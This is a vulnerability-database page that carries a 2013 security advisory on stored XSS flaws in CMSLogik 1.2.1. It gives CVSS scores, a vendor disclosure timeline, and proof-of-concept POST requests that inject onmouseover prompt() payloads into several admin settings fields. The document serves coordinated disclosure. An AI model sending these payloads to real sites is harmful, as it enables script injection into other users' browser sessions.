Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2013-5136
HistoryApr 14, 2013 - 12:00 a.m.

CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities

2013-04-1400:00:00
Gjoko Krstic
zeroscience.mk
41

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

AI Score

Confidence

High

0.01 Low

EPSS

Percentile

83.8%

JSON

Title: CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities
Advisory ID: ZSL-2013-5136
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 14.04.2013

Summary

CMSLogik is built on a solid & lightweight framework called CodeIgniter, and design powered by Bootstrap. This combination allows for greater security, extensive flexibility, and ease of use. You can use CMSLogik for almost any niche that your project might fall into.

Description

CMSLogik suffers from multiple stored XSS vulnerabilities when parsing user input to several parameters via POST method. Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user’s browser session.

Vendor

ThemeLogik - <http://www.themelogik.com/cmslogik&gt;

Affected Version

1.2.1 and 1.2.0

Tested On

Router Webserver

Vendor Status

[05.04.2013] Vulnerability discovered.
[05.04.2013] Contact with the vendor.
[05.04.2013] Vendor replies asking more details.
[05.04.2013] Sent detailed information to the vendor.
[08.04.2013] Vendor confirms the issues promising patch.
[14.04.2013] Public security advisory released.

PoC

cmslogik_xss.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://cxsecurity.com/issue/WLB-2013040105&gt;
[2] <http://www.exploit-db.com/exploits/24959/&gt;
[3] <http://packetstormsecurity.com/files/121303&gt;
[4] <http://osvdb.org/show/osvdb/92322&gt;
[5] <http://osvdb.org/show/osvdb/92323&gt;
[6] <http://osvdb.org/show/osvdb/92324&gt;
[7] <http://osvdb.org/show/osvdb/92325&gt;
[8] <http://osvdb.org/show/osvdb/92326&gt;
[9] <http://xforce.iss.net/xforce/xfdb/83429&gt;
[10] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-3535&gt;
[11] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3535&gt;

Changelog

[14.04.2013] - Initial release
[15.04.2013] - Added reference [1] and [2]
[16.04.2013] - Added reference [3], [4], [5], [6], [7] and [8]
[19.04.2013] - Added reference [9]
[14.05.2013] - Added reference [10] and [11]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>CMSLogik 1.2.1 Multiple Persistent XSS Vulnerabilities


Vendor: ThemeLogik
Product web page: http://www.themelogik.com/cmslogik
Affected version: 1.2.1 and 1.2.0

Summary: CMSLogik is built on a solid &amp; lightweight framework
called CodeIgniter, and design powered by Bootstrap. This
combination allows for greater security, extensive flexibility,
and ease of use. You can use CMSLogik for almost any niche that
your project might fall into.

Desc: CMSLogik suffers from multiple stored XSS vulnerabilities
when parsing user input to several parameters via POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML
and script code in a user's browser session.

Tested on: Apache/2.2.22
           PHP/5.3.15


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5136
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5136.php


05.04.2013

--

==============================================================================

POST http://localhost/cmslogik/admin/settings HTTP/1.1

admin_email	"onmouseover=prompt("XSS1")&gt;
default_level	2
default_page	1
default_url	http://themelogik.com/cmslogik/
email_activate	0
header_title	"onmouseover=prompt("XSS2")&gt;
login	1
registration	1
site_title	"onmouseover=prompt("XSS3")&gt;
update_settings	Update Settings
welcome_email	0

==============================================================================

POST http://localhost/cmslogik/admin/captcha_settings HTTP/1.1

captcha_settings	Update
recaptcha_private	"onmouseover=prompt("XSS4")&gt;
recaptcha_public	"onmouseover=prompt("XSS5")&gt;

==============================================================================

POST http://localhost/cmslogik/admin/social_settings HTTP/1.1

fb_appid	"onmouseover=prompt("XSS6")&gt;
fb_secret	"onmouseover=prompt("XSS7")&gt;
social_settings	Update
tw_consumer_key	"onmouseover=prompt("XSS8")&gt;
tw_consumer_secret	"onmouseover=prompt("XSS9")&gt;

==============================================================================

POST http://localhost/cmslogik/admin/gallery/save_item_settings HTTP/1.1

imgid	76
long	test
short	test
slug	"onmouseover=prompt("XSS10")&gt;
status	live
title	test

==============================================================================

POST http://localhost/cmslogik/admin/edit_menu_item_ajax HTTP/1.1

item_link	"onmouseover=prompt("XSS11")&gt;
item_name	test
item_order	0
mid	9

==============================================================================
</p></body></html>

Related

cve 1
nvd 1
cvelist 1
prion 1
cve
cve
CVE-2013-3535
2013-05-13 23:55:02
nvd
nvd
CVE-2013-3535
2013-05-13 23:55:02
cvelist
cvelist
CVE-2013-3535
2013-05-13 23:00:00
prion
prion
Cross site scripting
2013-05-13 23:55:00

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

AI Score

Confidence

High

0.01 Low

EPSS

Percentile

83.8%

JSON
Related for ZSL-2013-5136
cve1nvd1cvelist1prion1